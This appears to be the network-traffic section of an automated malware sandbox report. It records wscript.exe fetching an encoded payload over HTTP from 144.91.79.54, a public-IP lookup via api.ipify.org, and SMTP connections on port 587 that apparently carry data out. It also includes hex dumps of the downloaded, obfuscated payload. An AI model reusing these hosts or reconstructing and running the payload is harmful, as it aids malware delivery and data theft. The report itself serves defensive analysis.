                                                                Oct 22, 2024 14:46:05.739391088 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.739403963 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.739439011 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.739454031 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.739640951 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.739687920 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.739694118 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.739722967 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.739759922 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.739783049 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.739797115 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.739841938 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.740255117 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.740288019 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.740322113 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.740348101 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.740364075 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.740400076 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.740417004 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.740865946 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.740900040 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.740912914 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.740933895 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.740967989 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.740978956 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.741002083 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.741050005 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.741511106 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.741545916 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.741580963 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.741596937 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.741615057 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.741650105 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.741667032 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.741684914 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.741722107 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.741738081 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.742387056 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.742424011 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.742446899 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.742458105 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.742492914 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.742507935 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.742527008 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.742559910 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.742571115 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.742594004 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.742640018 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.743308067 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.743362904 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.743396997 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.743416071 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.743433952 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.743468046 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.743484020 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.743504047 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.743558884 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.744029045 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.744064093 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.744112968 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.744113922 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.744147062 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.744179964 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.744198084 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.744215012 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.744250059 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.744265079 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.744283915 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.744328022 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.744837999 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.744889975 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.744923115 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.744940996 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.744956017 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.744987965 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.744996071 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.745022058 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.745054007 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.745059967 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.745086908 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.745121002 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.745134115 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.745666981 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.745701075 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.745718002 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.750003099 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.750058889 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.750061989 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.750092030 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.750149012 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.750163078 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.750309944 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.750343084 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.750359058 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.750394106 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.750428915 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.750442028 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.750612974 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.750648022 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.750658035 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.750696898 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.750739098 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.750823975 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.750855923 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.750895023 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.750904083 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.750976086 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.751008987 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.751020908 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.751059055 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.751092911 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.751101971 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.751127958 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.751177073 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.751379967 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.751481056 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.751516104 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.751530886 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.751632929 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.751667023 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.751681089 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.797602892 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.854089022 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.854162931 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.854199886 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.854218960 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.854325056 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.854357958 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.854379892 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.854408026 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.854443073 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.854459047 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.854732990 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.854765892 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.854785919 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.854800940 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.854849100 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.855038881 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.855086088 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.855120897 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.855134964 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.855154991 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.855187893 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.855206013 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.855490923 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.855525017 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.855544090 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.855559111 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.855592012 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.855608940 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.855627060 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.855659962 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.855675936 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.855694056 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.855726957 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.855743885 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.856292963 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.856328964 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.856344938 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.856395960 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.856431961 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.856450081 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.856466055 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.856499910 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.856515884 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.856534958 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.856585026 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.856991053 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.857043982 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.857076883 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.857099056 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.857110977 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.857144117 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.857161045 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.857177973 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.857209921 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.857223034 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.857244015 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.857278109 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.857289076 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.857882977 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.857917070 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.857934952 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.857953072 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.857988119 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.858001947 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.858021975 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.858057022 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.858072996 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.858088970 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.858123064 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.858136892 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.858800888 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.858834982 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.858851910 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.858867884 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.858902931 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:05.858921051 CEST4970580192.168.2.5144.91.79.54
                                                                Oct 22, 2024 14:46:05.858935118 CEST8049705144.91.79.54192.168.2.5
                                                                Oct 22, 2024 14:46:27.829888105 CEST44349751104.26.13.205192.168.2.5
                                                                Oct 22, 2024 14:46:27.830085993 CEST49751443192.168.2.5104.26.13.205
                                                                Oct 22, 2024 14:46:27.835208893 CEST49751443192.168.2.5104.26.13.205
                                                                Oct 22, 2024 14:46:27.835227013 CEST44349751104.26.13.205192.168.2.5
                                                                Oct 22, 2024 14:46:28.437659025 CEST44349751104.26.13.205192.168.2.5
                                                                Oct 22, 2024 14:46:28.437861919 CEST49751443192.168.2.5104.26.13.205
                                                                Oct 22, 2024 14:46:28.450162888 CEST49751443192.168.2.5104.26.13.205
                                                                Oct 22, 2024 14:46:28.450187922 CEST44349751104.26.13.205192.168.2.5
                                                                Oct 22, 2024 14:46:28.450434923 CEST44349751104.26.13.205192.168.2.5
                                                                Oct 22, 2024 14:46:28.500616074 CEST49751443192.168.2.5104.26.13.205
                                                                Oct 22, 2024 14:46:28.636591911 CEST49751443192.168.2.5104.26.13.205
                                                                Oct 22, 2024 14:46:28.679327011 CEST44349751104.26.13.205192.168.2.5
                                                                Oct 22, 2024 14:46:28.823514938 CEST44349751104.26.13.205192.168.2.5
                                                                Oct 22, 2024 14:46:28.823602915 CEST44349751104.26.13.205192.168.2.5
                                                                Oct 22, 2024 14:46:28.823656082 CEST49751443192.168.2.5104.26.13.205
                                                                Oct 22, 2024 14:46:28.873050928 CEST49751443192.168.2.5104.26.13.205
                                                                Oct 22, 2024 14:46:29.716372013 CEST49764587192.168.2.5162.254.34.31
                                                                Oct 22, 2024 14:46:29.721887112 CEST58749764162.254.34.31192.168.2.5
                                                                Oct 22, 2024 14:46:29.721959114 CEST49764587192.168.2.5162.254.34.31
                                                                Oct 22, 2024 14:46:30.533571005 CEST58749764162.254.34.31192.168.2.5
                                                                Oct 22, 2024 14:46:30.536145926 CEST49764587192.168.2.5162.254.34.31
                                                                Oct 22, 2024 14:46:30.541593075 CEST58749764162.254.34.31192.168.2.5
                                                                Oct 22, 2024 14:46:30.698116064 CEST58749764162.254.34.31192.168.2.5
                                                                Oct 22, 2024 14:46:30.704118013 CEST49764587192.168.2.5162.254.34.31
                                                                Oct 22, 2024 14:46:30.709590912 CEST58749764162.254.34.31192.168.2.5
                                                                Oct 22, 2024 14:46:30.866111040 CEST58749764162.254.34.31192.168.2.5
                                                                Oct 22, 2024 14:46:30.875611067 CEST49764587192.168.2.5162.254.34.31
                                                                Oct 22, 2024 14:46:30.881145954 CEST58749764162.254.34.31192.168.2.5
                                                                Oct 22, 2024 14:46:31.045274973 CEST58749764162.254.34.31192.168.2.5
                                                                Oct 22, 2024 14:46:31.045531034 CEST49764587192.168.2.5162.254.34.31
                                                                Oct 22, 2024 14:46:31.050904989 CEST58749764162.254.34.31192.168.2.5
                                                                Oct 22, 2024 14:46:31.209078074 CEST58749764162.254.34.31192.168.2.5
                                                                Oct 22, 2024 14:46:31.210385084 CEST49764587192.168.2.5162.254.34.31
                                                                Oct 22, 2024 14:46:31.215876102 CEST58749764162.254.34.31192.168.2.5
                                                                Oct 22, 2024 14:46:31.375787973 CEST58749764162.254.34.31192.168.2.5
                                                                Oct 22, 2024 14:46:31.375917912 CEST49764587192.168.2.5162.254.34.31
                                                                Oct 22, 2024 14:46:31.381452084 CEST58749764162.254.34.31192.168.2.5
                                                                Oct 22, 2024 14:46:31.537045002 CEST58749764162.254.34.31192.168.2.5
                                                                Oct 22, 2024 14:46:31.537710905 CEST49764587192.168.2.5162.254.34.31
                                                                Oct 22, 2024 14:46:31.537759066 CEST49764587192.168.2.5162.254.34.31
                                                                Oct 22, 2024 14:46:31.537776947 CEST49764587192.168.2.5162.254.34.31
                                                                Oct 22, 2024 14:46:31.537789106 CEST49764587192.168.2.5162.254.34.31
                                                                Oct 22, 2024 14:46:31.543262959 CEST58749764162.254.34.31192.168.2.5
                                                                Oct 22, 2024 14:46:31.543278933 CEST58749764162.254.34.31192.168.2.5
                                                                Oct 22, 2024 14:46:31.543292999 CEST58749764162.254.34.31192.168.2.5
                                                                Oct 22, 2024 14:46:31.543306112 CEST58749764162.254.34.31192.168.2.5
                                                                Oct 22, 2024 14:46:31.704010010 CEST58749764162.254.34.31192.168.2.5
                                                                Oct 22, 2024 14:46:31.750612974 CEST49764587192.168.2.5162.254.34.31
                                                                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                Oct 22, 2024 14:46:27.815975904 CEST | 55399 | 53 | 192.168.2.5 | 1.1.1.1
                                                                Oct 22, 2024 14:46:27.823873997 CEST | 53 | 55399 | 1.1.1.1 | 192.168.2.5
                                                                Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                                Oct 22, 2024 14:46:27.815975904 CEST | 192.168.2.5 | 1.1.1.1 | 0x5953 | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
                                                                Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                                Oct 22, 2024 14:46:27.823873997 CEST | 1.1.1.1 | 192.168.2.5 | 0x5953 | No error (0) | api.ipify.org |  | 104.26.13.205 | A (IP address) | IN (0x0001) | false
                                                                Oct 22, 2024 14:46:27.823873997 CEST | 1.1.1.1 | 192.168.2.5 | 0x5953 | No error (0) | api.ipify.org |  | 104.26.12.205 | A (IP address) | IN (0x0001) | false
                                                                Oct 22, 2024 14:46:27.823873997 CEST | 1.1.1.1 | 192.168.2.5 | 0x5953 | No error (0) | api.ipify.org |  | 172.67.74.152 | A (IP address) | IN (0x0001) | false
                                                                • api.ipify.org
                                                                • 144.91.79.54
                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                0 | 192.168.2.5 | 49705 | 144.91.79.54 | 80 | 6200 | C:\Windows\System32\wscript.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Oct 22, 2024 14:46:03.732659101 CEST | 152 | OUT | GET /1210/s HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Accept: */*
                                                                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                Host: 144.91.79.54
                                                                Oct 22, 2024 14:46:04.588548899 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 22 Oct 2024 12:46:04 GMT
                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                Last-Modified: Wed, 02 Oct 2024 01:26:13 GMT
                                                                ETag: "6ab0-6237452d358f3"
                                                                Accept-Ranges: bytes
                                                                Content-Length: 27312
                                                                Keep-Alive: timeout=5, max=100
                                                                Connection: Keep-Alive
                                                                Data Raw: 33 44 33 44 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 [TRUNCATED]
                                                                Data Ascii: 3D3D414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414
                                                                Oct 22, 2024 14:46:04.588563919 CEST | 1236 | IN | Data Raw: 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34
                                                                Data Ascii: 141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141
                                                                Oct 22, 2024 14:46:04.588589907 CEST | 424 | IN | Data Raw: 44 33 39 33 32 36 33 37 36 34 41 33 33 35 39 37 30 33 31 35 37 34 43 37 41 34 36 35 37 36 32 36 43 36 38 33 32 35 39 37 41 37 30 36 41 36 32 37 39 35 36 36 45 34 39 33 39 34 44 36 45 36 32 37 33 33 31 34 37 36 35 36 37 33 38 36 44 35 41 37 35 36
                                                                Data Ascii: D393263764A33597031574C7A4657626C6832597A706A6279566E49394D6E627331476567386D5A756C45647A566E6330784449676F51442B3869497742585975343262705258596A6C47627742585135316B49395557626835474969416A4C7734434D75456A4939343262704E6E636C5A4849355258613035
                                                                Oct 22, 2024 14:46:04.588601112 CEST | 1236 | IN | Data Raw: 41 37 30 36 41 36 32 37 39 35 36 36 45 34 39 33 39 34 44 36 45 36 32 37 33 33 31 34 37 36 35 36 37 36 42 34 38 36 32 36 39 33 31 35 37 35 41 37 41 34 45 35 38 35 39 33 38 36 46 35 31 34 34 34 42 33 30 36 37 35 30 32 46 34 39 37 39 36 33 36 43 36
                                                                Data Ascii: A706A6279566E49394D6E6273314765676B48626931575A7A4E5859386F51444B3067502F4979636C6C6E4939556D62767857596B355759304E48496967544C4752565669307A5A756C475A764E6D626C4269497734534D69306A62766C326379566D6467775762343944502F75373741414141414141414141
                                                                Oct 22, 2024 14:46:04.588610888 CEST | 1236 | IN | Data Raw: 37 34 31 33 34 34 32 35 31 35 41 34 31 33 34 34 33 34 31 33 30 34 31 36 37 34 44 34 31 34 31 34 34 34 31 37 39 34 31 34 31 34 44 34 31 34 35 34 34 34 31 37 39 34 31 34 31 34 44 34 31 35 31 34 37 34 31 37 33 34 32 35 31 36 31 34 31 35 35 34 38 34
                                                                Data Ascii: 7413442515A413443413041674D414144417941414D414544417941414D4151474173425161415548414342414141554741744251594134454173425159413447417942515A41514841754251534145414153414152414141417741674C414144417541414D41344341784141414141414175427762416B4741
                                                                Oct 22, 2024 14:46:04.588620901 CEST | 424 | IN | Data Raw: 38 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 37 37 34 31 33 38 34 31 34 31 34 31 34 31 34 32 34 41 34 31 34 31 34 44 34 31 37 41 34 31 34 31 34 31 34 31 34 31 34 31 35 31 34 31 34 31 34 31 34 31 34 31 34
                                                                Data Ascii: 84141414141414141414141414177413841414141424A41414D417A41414141414151414141414141414141414141414141414141414167414141614141414142415141414141414141414141414141414141414141414141414167414141414141514141414141414141414141414141414141414141674141
